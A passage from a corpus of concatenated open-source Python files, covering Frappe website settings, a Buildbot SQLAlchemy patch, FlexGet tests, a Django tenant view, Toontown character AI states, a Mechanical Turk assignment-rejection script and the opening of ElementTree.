            {"label": _("My Account"), "url": "/me"},
            # {"class": "divider"},
            {"label": _("Logout"), "url": "/?cmd=web_logout"}
        ]
    })
    settings = frappe.get_single("Website Settings")
    # copy plain display fields straight onto the context when present
    for k in ["banner_html", "brand_html", "copyright", "twitter_share_via",
        "facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
        "disable_signup", "hide_footer_signup", "head_html", "title_prefix",
        "navbar_search"]:
        if hasattr(settings, k):
            context[k] = settings.get(k)
    if settings.address:
        context["footer_address"] = settings.address
    # boolean-ish flags are normalized to ints for the templates
    for k in ["facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
        "disable_signup"]:
        context[k] = int(context.get(k) or 0)
    if frappe.request:
        # URL-quote current address and title for share links
        context.url = quote(str(get_request_site_address(full_address=True)), safe="/:")
        context.encoded_title = quote(encode(context.title or ""), str(""))
    for update_website_context in hooks.update_website_context or []:
        frappe.get_attr(update_website_context)(context)
    context.web_include_js = hooks.web_include_js or []
    context.web_include_css = hooks.web_include_css or []
    via_hooks = frappe.get_hooks("website_context")
    for key in via_hooks:
        context[key] = via_hooks[key]
        # hooks return lists; scalar keys keep only the last value
        if key not in ("top_bar_items", "footer_items", "post_login") \
            and isinstance(context[key], (list, tuple)):
            context[key] = context[key][-1]
    add_website_theme(context)
    if not context.get("favicon"):
        context["favicon"] = "/assets/frappe/images/favicon.png"
    # "attach_files:" is treated as an unset favicon value
    if settings.favicon and settings.favicon != "attach_files:":
        context["favicon"] = settings.favicon
    return context
def get_items(parentfield):
    """Return Top Bar Item rows for *parentfield* ('top_bar_items' or
    'footer_items'), with child rows nested under their parent row's
    ``child_items`` list.  Rows without a ``parent_label`` are top-level.
    """
    all_top_items = frappe.db.sql("""\
select * from `tabTop Bar Item`
where parent='Website Settings' and parentfield= %s
order by idx asc""", parentfield, as_dict=1)
    # top-level rows are those without a parent_label
    top_items = [d for d in all_top_items if not d['parent_label']]
    # attach child items to top bar
    for d in all_top_items:
        if d['parent_label']:
            # attach to the first top-level row with a matching label
            for t in top_items:
                if t['label']==d['parent_label']:
                    if not 'child_items' in t:
                        t['child_items'] = []
                    t['child_items'].append(d)
                    break
    return top_items
| StrellaGroup/frappe | frappe/website/doctype/website_settings/website_settings.py | Python | mit | 4,709 |
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import re
from buildbot.util import sautils
from sqlalchemy.engine import reflection
from sqlalchemy.dialects.sqlite.base import SQLiteDialect, _pragma_cursor
from sqlalchemy.dialects.sqlite.base import sqltypes, util
@reflection.cache
def get_columns_06x_fixed(self, connection, table_name, schema=None, **kw):
    """SQLAlchemy 0.6.x SQLiteDialect.get_columns with the fix for
    ticket #2189 backported (strip surrounding quotes from reflected
    column names).

    Returns a list of column-description dicts with keys
    name/type/nullable/default/primary_key, read via PRAGMA table_info.
    """
    quote = self.identifier_preparer.quote_identifier
    if schema is not None:
        pragma = "PRAGMA %s." % quote(schema)
    else:
        pragma = "PRAGMA "
    qtable = quote(table_name)
    c = _pragma_cursor(connection.execute("%stable_info(%s)" % (pragma, qtable)))
    #### found_table = False (pyflake)
    columns = []
    while True:
        row = c.fetchone()
        if row is None:
            break
        (name, type_, nullable, default, has_default, primary_key) = (row[1], row[2].upper(), not row[3], row[4], row[4] is not None, row[5])
        # the ticket-2189 fix: drop quotes PRAGMA may include in the name
        name = re.sub(r'^\"|\"$', '', name)
        #### if default:
        #### default = re.sub(r"^\'|\'$", '', default)
        # split the declared type into base name and optional "(args)"
        match = re.match(r'(\w+)(\(.*?\))?', type_)
        if match:
            coltype = match.group(1)
            args = match.group(2)
        else:
            coltype = "VARCHAR"
            args = ''
        try:
            coltype = self.ischema_names[coltype]
        except KeyError:
            util.warn("Did not recognize type '%s' of column '%s'" %
                (coltype, name))
            coltype = sqltypes.NullType
        if args is not None:
            # instantiate the type with its numeric arguments, e.g. VARCHAR(30)
            args = re.findall(r'(\d+)', args)
            coltype = coltype(*[int(a) for a in args])
        columns.append({
            'name' : name,
            'type' : coltype,
            'nullable' : nullable,
            'default' : default,
            'primary_key': primary_key
        })
    return columns
@reflection.cache
def get_columns_07x_fixed(self, connection, table_name, schema=None, **kw):
    """SQLAlchemy 0.7.x SQLiteDialect.get_columns with the fix for
    ticket #2189 (strip surrounding quotes from reflected column names).

    Differs from the 0.6.x variant in that the type arguments are applied
    inside the try block, NullType is instantiated, and an
    ``autoincrement`` key is included in each column dict.
    """
    quote = self.identifier_preparer.quote_identifier
    if schema is not None:
        pragma = "PRAGMA %s." % quote(schema)
    else:
        pragma = "PRAGMA "
    qtable = quote(table_name)
    c = _pragma_cursor(connection.execute("%stable_info(%s)" % (pragma, qtable)))
    #### found_table = False (pyflake)
    columns = []
    while True:
        row = c.fetchone()
        if row is None:
            break
        (name, type_, nullable, default, has_default, primary_key) = (row[1], row[2].upper(), not row[3], row[4], row[4] is not None, row[5])
        # the ticket-2189 fix: drop quotes PRAGMA may include in the name
        name = re.sub(r'^\"|\"$', '', name)
        #### if default:
        #### default = re.sub(r"^\'|\'$", '', default)
        # split the declared type into base name and optional "(args)"
        match = re.match(r'(\w+)(\(.*?\))?', type_)
        if match:
            coltype = match.group(1)
            args = match.group(2)
        else:
            coltype = "VARCHAR"
            args = ''
        try:
            coltype = self.ischema_names[coltype]
            if args is not None:
                args = re.findall(r'(\d+)', args)
                coltype = coltype(*[int(a) for a in args])
        except KeyError:
            util.warn("Did not recognize type '%s' of column '%s'" %
                (coltype, name))
            coltype = sqltypes.NullType()
        columns.append({
            'name' : name,
            'type' : coltype,
            'nullable' : nullable,
            'default' : default,
            'autoincrement':default is None,
            'primary_key': primary_key
        })
    return columns
def patch():
    """Install the fixed ``get_columns`` on SQLiteDialect.

    Fix for http://www.sqlalchemy.org/trac/ticket/2189, backported to 0.6.0.
    Picks the 0.6.x or 0.7.x variant depending on the installed
    SQLAlchemy version.
    """
    running_06x = sautils.sa_version()[:2] == (0, 6)
    SQLiteDialect.get_columns = (
        get_columns_06x_fixed if running_06x else get_columns_07x_fixed)
| denny820909/builder | lib/python2.7/site-packages/buildbot-0.8.8-py2.7.egg/buildbot/monkeypatches/sqlalchemy2189.py | Python | mit | 4,442 |
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from datetime import datetime
import math
import pytest
from flexget.utils import json
from flexget.utils.tools import parse_filesize, split_title_year
def compare_floats(float1, float2):
    """Return True when the two floats differ by at most 1e-4."""
    return abs(float1 - float2) <= 0.0001
class TestJson(object):
    """Round-trip tests for flexget's datetime-aware JSON helpers."""

    def test_json_encode_dt(self):
        # a bare datetime should serialize to its ISO-8601 string form
        date_str = '2016-03-11T17:12:17Z'
        dt = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%SZ')
        encoded_dt = json.dumps(dt, encode_datetime=True)
        assert encoded_dt == '"%s"' % date_str

    def test_json_encode_dt_dict(self):
        # datetimes nested inside containers are encoded the same way
        date_str = '2016-03-11T17:12:17Z'
        dt = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%SZ')
        date_obj = {'date': dt}
        encoded_dt = json.dumps(date_obj, encode_datetime=True)
        assert encoded_dt == '{"date": "%s"}' % date_str

    def test_json_decode_dt(self):
        # an ISO-8601 string decodes back into a datetime
        date_str = '"2016-03-11T17:12:17Z"'
        dt = datetime.strptime(date_str, '"%Y-%m-%dT%H:%M:%SZ"')
        decoded_dt = json.loads(date_str, decode_datetime=True)
        assert dt == decoded_dt

    def test_json_decode_dt_obj(self):
        # datetime strings nested inside objects are decoded too
        date_str = '"2016-03-11T17:12:17Z"'
        date_obj_str = '{"date": %s}' % date_str
        decoded_dt = json.loads(date_obj_str, decode_datetime=True)
        dt = datetime.strptime(date_str, '"%Y-%m-%dT%H:%M:%SZ"')
        assert decoded_dt == {'date': dt}
class TestParseFilesize(object):
    """Tests for parse_filesize: strings like '200KB' -> a size in MiB.

    SI units (KB/GB) are decimal (powers of 1000); IEC units (KiB/GiB)
    are binary (powers of 1024); results are compared with a small
    epsilon via compare_floats.
    """

    def test_parse_filesize_no_space(self):
        # unit may directly follow the number
        size = '200KB'
        expected = 200 * 1000 / 1024 ** 2
        assert compare_floats(parse_filesize(size), expected)

    def test_parse_filesize_space(self):
        # a space between number and unit is accepted
        size = '200.0 KB'
        expected = 200 * 1000 / 1024 ** 2
        assert compare_floats(parse_filesize(size), expected)

    def test_parse_filesize_non_si(self):
        # GB is decimal: 1000**3 bytes per unit
        size = '1234 GB'
        expected = 1234 * 1000 ** 3 / 1024 ** 2
        assert compare_floats(parse_filesize(size), expected)

    def test_parse_filesize_auto(self):
        # GiB is binary: 1024**3 bytes per unit
        size = '1234 GiB'
        expected = 1234 * 1024 ** 3 / 1024 ** 2
        assert compare_floats(parse_filesize(size), expected)

    def test_parse_filesize_auto_mib(self):
        # MiB input is already the output unit
        size = '1234 MiB'
        assert compare_floats(parse_filesize(size), 1234)

    def test_parse_filesize_ib_not_valid(self):
        # a bare 'ib' unit must be rejected
        with pytest.raises(ValueError):
            parse_filesize('100 ib')

    def test_parse_filesize_single_digit(self):
        size = '1 GiB'
        assert compare_floats(parse_filesize(size), 1024)

    def test_parse_filesize_separators(self):
        # comma and space thousands separators are stripped
        size = '1,234 GiB'
        assert parse_filesize(size) == 1263616
        size = '1 234 567 MiB'
        assert parse_filesize(size) == 1234567
class TestSplitYearTitle(object):
    """Tests for split_title_year: split a trailing year off a title.

    Covers plain, parenthesized, dashed and dotted year forms, titles with
    inner parentheses, and a title that *is* a year ('2020' stays a title).
    """

    @pytest.mark.parametrize('title, expected_title, expected_year', [
        ('The Matrix', 'The Matrix', None),
        ('The Matrix 1999', 'The Matrix', 1999),
        ('The Matrix (1999)', 'The Matrix', 1999),
        ('The Matrix - 1999', 'The Matrix -', 1999),
        ('The.Matrix.1999', 'The.Matrix.', 1999),
        ('The Human Centipede III (Final Sequence)', 'The Human Centipede III (Final Sequence)', None),
        ('The Human Centipede III (Final Sequence) (2015)', 'The Human Centipede III (Final Sequence)', 2015),
        ('2020', '2020', None)
    ])
    def test_split_year_title(self, title, expected_title, expected_year):
        assert split_title_year(title) == (expected_title, expected_year)
| jawilson/Flexget | flexget/tests/test_utils.py | Python | mit | 3,596 |
from customers.models import Client
from django.conf import settings
from django.db import utils
from django.views.generic import TemplateView
from tenant_schemas.utils import remove_www
class HomeView(TemplateView):
    """Public landing page; inspects tenant state to drive the template.

    Sets context flags for three situations: database not migrated yet
    (``need_sync``), no public tenant record (``no_public_tenant``), and
    only the public tenant existing (``only_public_tenant``).
    """
    template_name = "index_public.html"

    def get_context_data(self, **kwargs):
        context = super(HomeView, self).get_context_data(**kwargs)
        # hostname without port or leading www, for display in the template
        hostname_without_port = remove_www(self.request.get_host().split(':')[0])
        try:
            Client.objects.get(schema_name='public')
        except utils.DatabaseError:
            # table does not exist yet: migrations have not been run
            context['need_sync'] = True
            context['shared_apps'] = settings.SHARED_APPS
            context['tenants_list'] = []
            return context
        except Client.DoesNotExist:
            # schema exists but no public tenant row was created
            context['no_public_tenant'] = True
            context['hostname'] = hostname_without_port
        if Client.objects.count() == 1:
            context['only_public_tenant'] = True
        context['tenants_list'] = Client.objects.all()
        return context
| mcanaves/django-tenant-schemas | examples/tenant_tutorial/tenant_tutorial/views.py | Python | mit | 1,030 |
# File: C (Python 2.4)
from otp.ai.AIBaseGlobal import *
from direct.distributed.ClockDelta import *
from direct.fsm import StateData
from direct.directnotify import DirectNotifyGlobal
import random
from direct.task import Task
from toontown.toonbase import ToontownGlobals
import CCharChatter
import CCharPaths
class CharLonelyStateAI(StateData.StateData):
    """AI state for a classic char standing alone.

    After a random 3-15 second delay it fires the done event with
    status 'done' so the character FSM can move on (start walking).
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('CharLonelyStateAI')

    def __init__(self, doneEvent, character):
        StateData.StateData.__init__(self, doneEvent)
        self._CharLonelyStateAI__doneEvent = doneEvent
        self.character = character

    def enter(self):
        # NOTE: 'name' is computed but never used (decompiler artifact)
        if hasattr(self.character, 'name'):
            name = self.character.getName()
        else:
            name = 'character'
        self.notify.debug('Lonely ' + self.character.getName() + '...')
        StateData.StateData.enter(self)
        # stand around for a random interval before signalling done
        duration = random.randint(3, 15)
        taskMgr.doMethodLater(duration, self._CharLonelyStateAI__doneHandler, self.character.taskName('startWalking'))

    def exit(self):
        StateData.StateData.exit(self)
        # cancel the pending 'startWalking' timer if we leave early
        taskMgr.remove(self.character.taskName('startWalking'))

    def _CharLonelyStateAI__doneHandler(self, task):
        # announce state completion to the owning FSM
        doneStatus = { }
        doneStatus['state'] = 'lonely'
        doneStatus['status'] = 'done'
        messenger.send(self._CharLonelyStateAI__doneEvent, [
            doneStatus])
        return Task.done
class CharChattyStateAI(StateData.StateData):
    """AI state in which a classic char chats with nearby avatars.

    A repeating 'blather' task picks greeting/comment lines from
    CCharChatter tables and broadcasts them via the character's
    distributed 'setChat' update, avoiding immediate repeats.
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('CharChattyStateAI')

    def __init__(self, doneEvent, character):
        StateData.StateData.__init__(self, doneEvent)
        self._CharChattyStateAI__doneEvent = doneEvent
        self.character = character
        self._CharChattyStateAI__chatTaskName = 'characterChat-' + str(character)
        self.lastChatTarget = 0
        # nextChatTime throttles how often blather() may speak
        self.nextChatTime = 0
        # lastMessage holds [category, msg index] of the previous line
        self.lastMessage = [
            -1,
            -1]

    def enter(self):
        # NOTE: 'name' is computed but never used (decompiler artifact)
        if hasattr(self.character, 'name'):
            name = self.character.getName()
        else:
            name = 'character'
        self.notify.debug('Chatty ' + self.character.getName() + '...')
        self.chatter = CCharChatter.getChatter(self.character.getName(), self.character.getCCChatter())
        if self.chatter != None:
            # restart the repeating chat task
            taskMgr.remove(self._CharChattyStateAI__chatTaskName)
            taskMgr.add(self.blather, self._CharChattyStateAI__chatTaskName)
        StateData.StateData.enter(self)

    def pickMsg(self, category):
        """Return a random message index for *category*, or None."""
        self.getLatestChatter()
        if self.chatter:
            return random.randint(0, len(self.chatter[category]) - 1)
        else:
            return None

    def getLatestChatter(self):
        # refresh the chatter table (it can change with holiday events)
        self.chatter = CCharChatter.getChatter(self.character.getName(), self.character.getCCChatter())

    def setCorrectChatter(self):
        # same refresh as getLatestChatter; kept as a separate entry point
        self.chatter = CCharChatter.getChatter(self.character.getName(), self.character.getCCChatter())

    def blather(self, task):
        """Repeating task: say one line to the nearest avatar, then wait."""
        now = globalClock.getFrameTime()
        if now < self.nextChatTime:
            return Task.cont
        self.getLatestChatter()
        if self.character.lostInterest():
            self.leave()
            return Task.done
        if not self.chatter:
            self.notify.debug('I do not want to talk')
            return Task.done
        if not self.character.getNearbyAvatars():
            return Task.cont
        target = self.character.getNearbyAvatars()[0]
        # greet a new target, otherwise make a follow-up comment
        if self.lastChatTarget != target:
            self.lastChatTarget = target
            category = CCharChatter.GREETING
        else:
            category = CCharChatter.COMMENT
        self.setCorrectChatter()
        # avoid repeating the previous line when alternatives exist
        if category == self.lastMessage[0] and len(self.chatter[category]) > 1:
            msg = self.lastMessage[1]
            lastMsgIndex = self.lastMessage[1]
            if lastMsgIndex < len(self.chatter[category]) and lastMsgIndex >= 0:
                while self.chatter[category][msg] == self.chatter[category][lastMsgIndex]:
                    msg = self.pickMsg(category)
                    if not msg:
                        break
                    continue
            else:
                msg = self.pickMsg(category)
        else:
            msg = self.pickMsg(category)
        if msg == None:
            self.notify.debug('I do not want to talk')
            return Task.done
        self.character.sendUpdate('setChat', [
            category,
            msg,
            target])
        self.lastMessage = [
            category,
            msg]
        # wait 8-12 seconds before speaking again
        self.nextChatTime = now + 8.0 + random.random() * 4.0
        return Task.cont

    def leave(self):
        """Say goodbye (if possible) and schedule state completion."""
        if self.chatter != None:
            category = CCharChatter.GOODBYE
            msg = random.randint(0, len(self.chatter[CCharChatter.GOODBYE]) - 1)
            target = self.character.getNearbyAvatars()[0]
            self.character.sendUpdate('setChat', [
                category,
                msg,
                target])
        taskMgr.doMethodLater(1, self.doneHandler, self.character.taskName('waitToFinish'))

    def exit(self):
        StateData.StateData.exit(self)
        taskMgr.remove(self._CharChattyStateAI__chatTaskName)

    def doneHandler(self, task):
        # announce state completion to the owning FSM
        doneStatus = { }
        doneStatus['state'] = 'chatty'
        doneStatus['status'] = 'done'
        messenger.send(self._CharChattyStateAI__doneEvent, [
            doneStatus])
        return Task.done
class CharWalkStateAI(StateData.StateData):
    """AI state that walks a classic char one segment along its path graph.

    Picks a random adjacent node (avoiding an immediate back-track when
    possible), broadcasts 'setWalk', and signals done when the walk
    duration elapses.
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('CharWalkStateAI')

    def __init__(self, doneEvent, character, diffPath = None):
        StateData.StateData.__init__(self, doneEvent)
        self._CharWalkStateAI__doneEvent = doneEvent
        self.character = character
        # diffPath lets a character borrow another character's path table
        if diffPath == None:
            self.paths = CCharPaths.getPaths(character.getName(), character.getCCLocation())
        else:
            self.paths = CCharPaths.getPaths(diffPath, character.getCCLocation())
        self.speed = character.walkSpeed()
        self._CharWalkStateAI__lastWalkNode = CCharPaths.startNode
        self._CharWalkStateAI__curWalkNode = CCharPaths.startNode

    def enter(self):
        # choose the next node: forced when only one neighbour, otherwise
        # a random neighbour that is not the node we just came from
        destNode = self._CharWalkStateAI__lastWalkNode
        choices = CCharPaths.getAdjacentNodes(self._CharWalkStateAI__curWalkNode, self.paths)
        if len(choices) == 1:
            destNode = choices[0]
        else:
            while destNode == self._CharWalkStateAI__lastWalkNode:
                destNode = random.choice(CCharPaths.getAdjacentNodes(self._CharWalkStateAI__curWalkNode, self.paths))
        self.notify.debug('Walking ' + self.character.getName() + '... from ' + str(self._CharWalkStateAI__curWalkNode) + '(' + str(CCharPaths.getNodePos(self._CharWalkStateAI__curWalkNode, self.paths)) + ') to ' + str(destNode) + '(' + str(CCharPaths.getNodePos(destNode, self.paths)) + ')')
        self.character.sendUpdate('setWalk', [
            self._CharWalkStateAI__curWalkNode,
            destNode,
            globalClockDelta.getRealNetworkTime()])
        # schedule completion for when the char reaches the destination
        duration = CCharPaths.getWalkDuration(self._CharWalkStateAI__curWalkNode, destNode, self.speed, self.paths)
        t = taskMgr.doMethodLater(duration, self.doneHandler, self.character.taskName(self.character.getName() + 'DoneWalking'))
        t.newWalkNode = destNode
        self.destNode = destNode

    def exit(self):
        StateData.StateData.exit(self)
        taskMgr.remove(self.character.taskName(self.character.getName() + 'DoneWalking'))

    def getDestNode(self):
        # destNode only exists after enter() has run at least once
        if hasattr(self, 'destNode') and self.destNode:
            return self.destNode
        else:
            return self._CharWalkStateAI__curWalkNode

    def setCurNode(self, curWalkNode):
        self._CharWalkStateAI__curWalkNode = curWalkNode

    def doneHandler(self, task):
        # arrive: advance node bookkeeping and broadcast a stationary walk
        self._CharWalkStateAI__lastWalkNode = self._CharWalkStateAI__curWalkNode
        self._CharWalkStateAI__curWalkNode = task.newWalkNode
        self.character.sendUpdate('setWalk', [
            self._CharWalkStateAI__curWalkNode,
            self._CharWalkStateAI__curWalkNode,
            globalClockDelta.getRealNetworkTime()])
        doneStatus = { }
        doneStatus['state'] = 'walk'
        doneStatus['status'] = 'done'
        messenger.send(self._CharWalkStateAI__doneEvent, [
            doneStatus])
        return Task.done
class CharFollowChipStateAI(StateData.StateData):
    """AI walk state for Dale following Chip: walks to Chip's destination
    node while orbiting at a random angular offset (setFollowChip)."""
    notify = DirectNotifyGlobal.directNotify.newCategory('CharFollowChipStateAI')

    def __init__(self, doneEvent, character, followedChar):
        StateData.StateData.__init__(self, doneEvent)
        self._CharFollowChipStateAI__doneEvent = doneEvent
        self.character = character
        self.followedChar = followedChar
        self.paths = CCharPaths.getPaths(character.getName(), character.getCCLocation())
        self.speed = character.walkSpeed()
        self._CharFollowChipStateAI__lastWalkNode = CCharPaths.startNode
        self._CharFollowChipStateAI__curWalkNode = CCharPaths.startNode

    def enter(self, chipDestNode):
        # NOTE: this random-neighbour selection is dead code -- destNode is
        # unconditionally overwritten with chipDestNode just below
        destNode = self._CharFollowChipStateAI__lastWalkNode
        choices = CCharPaths.getAdjacentNodes(self._CharFollowChipStateAI__curWalkNode, self.paths)
        if len(choices) == 1:
            destNode = choices[0]
        else:
            while destNode == self._CharFollowChipStateAI__lastWalkNode:
                destNode = random.choice(CCharPaths.getAdjacentNodes(self._CharFollowChipStateAI__curWalkNode, self.paths))
        destNode = chipDestNode
        self.notify.debug('Walking ' + self.character.getName() + '... from ' + str(self._CharFollowChipStateAI__curWalkNode) + '(' + str(CCharPaths.getNodePos(self._CharFollowChipStateAI__curWalkNode, self.paths)) + ') to ' + str(destNode) + '(' + str(CCharPaths.getNodePos(destNode, self.paths)) + ')')
        # pick a random point on a circle of DaleOrbitDistance around Chip
        # (math and deg2Rad come from the wildcard AIBaseGlobal import --
        # presumably Panda3D helpers; verify against that module)
        self.offsetDistance = ToontownGlobals.DaleOrbitDistance
        angle = random.randint(0, 359)
        self.offsetX = math.cos(deg2Rad(angle)) * self.offsetDistance
        self.offsetY = math.sin(deg2Rad(angle)) * self.offsetDistance
        self.character.sendUpdate('setFollowChip', [
            self._CharFollowChipStateAI__curWalkNode,
            destNode,
            globalClockDelta.getRealNetworkTime(),
            self.offsetX,
            self.offsetY])
        duration = CCharPaths.getWalkDuration(self._CharFollowChipStateAI__curWalkNode, destNode, self.speed, self.paths)
        t = taskMgr.doMethodLater(duration, self._CharFollowChipStateAI__doneHandler, self.character.taskName(self.character.getName() + 'DoneWalking'))
        t.newWalkNode = destNode

    def exit(self):
        StateData.StateData.exit(self)
        taskMgr.remove(self.character.taskName(self.character.getName() + 'DoneWalking'))

    def _CharFollowChipStateAI__doneHandler(self, task):
        # arrive: advance node bookkeeping and broadcast a stationary update
        self._CharFollowChipStateAI__lastWalkNode = self._CharFollowChipStateAI__curWalkNode
        self._CharFollowChipStateAI__curWalkNode = task.newWalkNode
        self.character.sendUpdate('setFollowChip', [
            self._CharFollowChipStateAI__curWalkNode,
            self._CharFollowChipStateAI__curWalkNode,
            globalClockDelta.getRealNetworkTime(),
            self.offsetX,
            self.offsetY])
        doneStatus = { }
        doneStatus['state'] = 'walk'
        doneStatus['status'] = 'done'
        messenger.send(self._CharFollowChipStateAI__doneEvent, [
            doneStatus])
        return Task.done
class ChipChattyStateAI(CharChattyStateAI):
    """Chat state for Chip that mirrors every chat line to Dale.

    Overrides blather()/leave() to also send 'setChat' on the companion
    Dale distributed object (looked up via setDaleId).
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('ChipChattyStateAI')

    def setDaleId(self, daleId):
        # resolve the companion Dale DistributedObject; may be None if
        # the doId is not (yet) present in doId2do
        self.daleId = daleId
        self.dale = simbase.air.doId2do.get(self.daleId)

    def blather(self, task):
        """Like CharChattyStateAI.blather, but echoes the line to Dale.

        Note: unlike the base class, this version does not call
        setCorrectChatter() before the repeat check.
        """
        now = globalClock.getFrameTime()
        if now < self.nextChatTime:
            return Task.cont
        self.getLatestChatter()
        if self.character.lostInterest():
            self.leave()
            return Task.done
        if not self.chatter:
            self.notify.debug('I do not want to talk')
            return Task.done
        if not self.character.getNearbyAvatars():
            return Task.cont
        target = self.character.getNearbyAvatars()[0]
        # greet a new target, otherwise make a follow-up comment
        if self.lastChatTarget != target:
            self.lastChatTarget = target
            category = CCharChatter.GREETING
        else:
            category = CCharChatter.COMMENT
        # avoid repeating the previous line when alternatives exist
        if category == self.lastMessage[0] and len(self.chatter[category]) > 1:
            msg = self.lastMessage[1]
            lastMsgIndex = self.lastMessage[1]
            if lastMsgIndex < len(self.chatter[category]) and lastMsgIndex >= 0:
                while self.chatter[category][msg] == self.chatter[category][lastMsgIndex]:
                    msg = self.pickMsg(category)
                    if not msg:
                        break
                    continue
            else:
                msg = self.pickMsg(category)
        else:
            msg = self.pickMsg(category)
        if msg == None:
            self.notify.debug('I do not want to talk')
            return Task.done
        self.character.sendUpdate('setChat', [
            category,
            msg,
            target])
        # mirror the same line on Dale so the pair speak in unison
        if hasattr(self, 'dale') and self.dale:
            self.dale.sendUpdate('setChat', [
                category,
                msg,
                target])
        self.lastMessage = [
            category,
            msg]
        # wait 8-12 seconds before speaking again
        self.nextChatTime = now + 8.0 + random.random() * 4.0
        return Task.cont

    def leave(self):
        """Say goodbye on both Chip and Dale, then schedule completion."""
        if self.chatter != None:
            category = CCharChatter.GOODBYE
            msg = random.randint(0, len(self.chatter[CCharChatter.GOODBYE]) - 1)
            target = self.character.getNearbyAvatars()[0]
            self.character.sendUpdate('setChat', [
                category,
                msg,
                target])
            if hasattr(self, 'dale') and self.dale:
                self.dale.sendUpdate('setChat', [
                    category,
                    msg,
                    target])
        taskMgr.doMethodLater(1, self.doneHandler, self.character.taskName('waitToFinish'))
| ToonTownInfiniteRepo/ToontownInfinite | toontown/classicchars/CharStateDatasAI.py | Python | mit | 14,539 |
import argparse, json
import simpleamt
if __name__ == '__main__':
    # Python 2 script (print statements, raw_input): bulk-reject all
    # assignments belonging to the HITs listed in --hit_ids_file.
    parser = argparse.ArgumentParser(parents=[simpleamt.get_parent_parser()])
    args = parser.parse_args()
    mtc = simpleamt.get_mturk_connection_from_args(args)
    reject_ids = []
    if args.hit_ids_file is None:
        parser.error('Must specify --hit_ids_file.')
    # one HIT id per line
    with open(args.hit_ids_file, 'r') as f:
        hit_ids = [line.strip() for line in f]
    # collect every assignment id attached to the listed HITs
    for hit_id in hit_ids:
        for a in mtc.get_assignments(hit_id):
            reject_ids.append(a.AssignmentId)
    # confirm interactively before rejecting anything
    print ('This will reject %d assignments with '
           'sandbox=%s' % (len(reject_ids), str(args.sandbox)))
    print 'Continue?'
    s = raw_input('(Y/N): ')
    if s == 'Y' or s == 'y':
        print 'Rejecting assignments'
        for idx, assignment_id in enumerate(reject_ids):
            print 'Rejecting assignment %d / %d' % (idx + 1, len(reject_ids))
            mtc.reject_assignment(assignment_id, feedback='Invalid results')
    else:
        print 'Aborting'
| achalddave/simple-amt | reject_assignments.py | Python | mit | 970 |
#
# ElementTree
# $Id: ElementTree.py 3440 2008-07-18 14:45:01Z fredrik $
#
# light-weight XML support for Python 2.3 and later.
#
# history (since 1.2.6):
# 2005-11-12 fl added tostringlist/fromstringlist helpers
# 2006-07-05 fl merged in selected changes from the 1.3 sandbox
# 2006-07-05 fl removed support for 2.1 and earlier
# 2007-06-21 fl added deprecation/future warnings
# 2007-08-25 fl added doctype hook, added parser version attribute etc
# 2007-08-26 fl added new serializer code (better namespace handling, etc)
# 2007-08-27 fl warn for broken /tag searches on tree level
# 2007-09-02 fl added html/text methods to serializer (experimental)
# 2007-09-05 fl added method argument to tostring/tostringlist
# 2007-09-06 fl improved error handling
# 2007-09-13 fl added itertext, iterfind; assorted cleanups
# 2007-12-15 fl added C14N hooks, copy method (experimental)
#
# Copyright (c) 1999-2008 by Fredrik Lundh. All rights reserved.
#
# fredrik@pythonware.com
# http://www.pythonware.com
#
# --------------------------------------------------------------------
# The ElementTree toolkit is
#
# Copyright (c) 1999-2008 by Fredrik Lundh
#
# By obtaining, using, and/or copying this software and/or its
# associated documentation, you agree that you have read, understood,
# and will comply with the following terms and conditions:
#
# Permission to use, copy, modify, and distribute this software and
# its associated documentation for any purpose and without fee is
# hereby granted, provided that the above copyright notice appears in
# all copies, and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Secret Labs AB or the author not be used in advertising or publicity
# pertaining to distribution of the software without specific, written
# prior permission.
#
# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD
# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT-
# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR
# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
# --------------------------------------------------------------------
# Licensed to PSF under a Contributor Agreement.
# See http://www.python.org/psf/license for licensing details.
__all__ = [
# public symbols
"Comment",
"dump",
"Element", "ElementTree",
"fromstring", "fromstringlist",
"iselement", "iterparse",
"parse", "ParseError",
"PI", "ProcessingInstruction",
"QName",
"SubElement",
"tostring", "tostringlist",
"TreeBuilder",
"VERSION",
"XML",
"XMLParser", "XMLTreeBuilder",
]
VERSION = "1.3.0"
##
# The <b>Element</b> type is a flexible container object, designed to
# store hierarchical data structures in memory. The type can be
# described as a cross between a list and a dictionary.
# <p>
# Each element has a number of properties associated with it:
# <ul>
# <li>a <i>tag</i>. This is a string identifying what kind of data
# this element represents (the element type, in other words).</li>
# <li>a number of <i>attributes</i>, stored in a Python dictionary.</li>
# <li>a <i>text</i> string.</li>
# <li>an optional <i>tail</i> string.</li>
# <li>a number of <i>child elements</i>, stored in a Python sequence</li>
# </ul>
#
# To create an element instance, use the {@link #Element} constructor
# or the {@link #SubElement} factory function.
# <p>
# The {@link #ElementTree} class can be used to wrap an element
# structure, and convert it from and to XML.
##
import sys
import re
import warnings
class _SimpleElementPath(object):
